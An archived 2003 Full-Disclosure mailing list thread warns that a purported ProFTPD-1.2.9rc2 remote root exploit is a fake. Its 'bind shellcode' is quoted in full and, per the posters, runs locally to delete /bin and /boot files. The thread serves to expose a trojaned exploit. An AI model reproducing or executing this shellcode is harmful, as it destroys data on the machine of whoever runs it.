lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: lorenzohgh at nsrg-security.com (Lorenzo Hernandez Garcia-Hierro)
Subject: ProFTPD-1.2.9rc2 remote root exploit

Fucking jokes ,
i saw a strange shellcode so it didn't use it , hahahahaha,
and i saw too the local executed shellcode so again i didin't compiled nor
used it.
is it normal here ? people publishes here these type of jokes usually ?
anybody remembers the sshd fake exploit that binds a shell in port 77~~ ( i
don't remember ) but it was really funny !
mein Gott !

Best regards,
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->\x74\x72\x75\x6c\x75\x78
0x02->The truth is out there,
0x03-> outside your mind .
__________________________________
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453  7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
\x6e\x73\x72\x67
\x73\x65\x63\x75\x72\x69\x74\x79
\x72\x65\x73\x65\x61\x72\x63\x68
http://www.nsrg-security.com
______________________
----- Original Message ----- 
From: "Andreas Gietl" <a.gietl@...dmin.de>
To: <zim@...pl>
Cc: "Jean-Kevin Grosnakeur" <fufeur@...mail.com>;
<full-disclosure@...ts.netsys.com>
Sent: Friday, October 24, 2003 4:24 PM
Subject: Re: [Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit


> On Friday 24 October 2003 16:20, Robert Jaroszuk wrote:
>
> yeah, it deletes /bin/* boot/* and few other files.
>
> > On Fri, 24 Oct 2003, Andreas Gietl wrote:
> >
> > ; On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote:
> > ;
> > ; this seems to delete sth on the local harddisk. anybody else seeing
this
> > ; effect?
> >
> > Yea, something like that.
> >
> > /* x86 bind shellcode */
> > char sc[]=
> > "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
> > "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
> > "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
> > "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
> > "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
> > "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
> > "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
> > "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";
> >
> > [ cut ]
> >
> >   /* connect to the bindshell */
> >   printf("Trying to connect, please wait...\n");
> >   void(*sleep)()=(void*)sc;sleep(5);
> >
> > This exploit tries to run shellcode on local machine.
> > Probably smth evil in this shellcode:
>
> -- 
> e-admin internet gmbh
> Andreas Gietl                                            tel +49 941
3810884
> Ludwig-Thoma-Strasse 35                      fax +49 (0)1805/39160 - 29104
> 93051 Regensburg                                  mobil +49 171 6070008
>
> PGP/GPG-Key unter http://www.e-admin.de/gpg.html
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ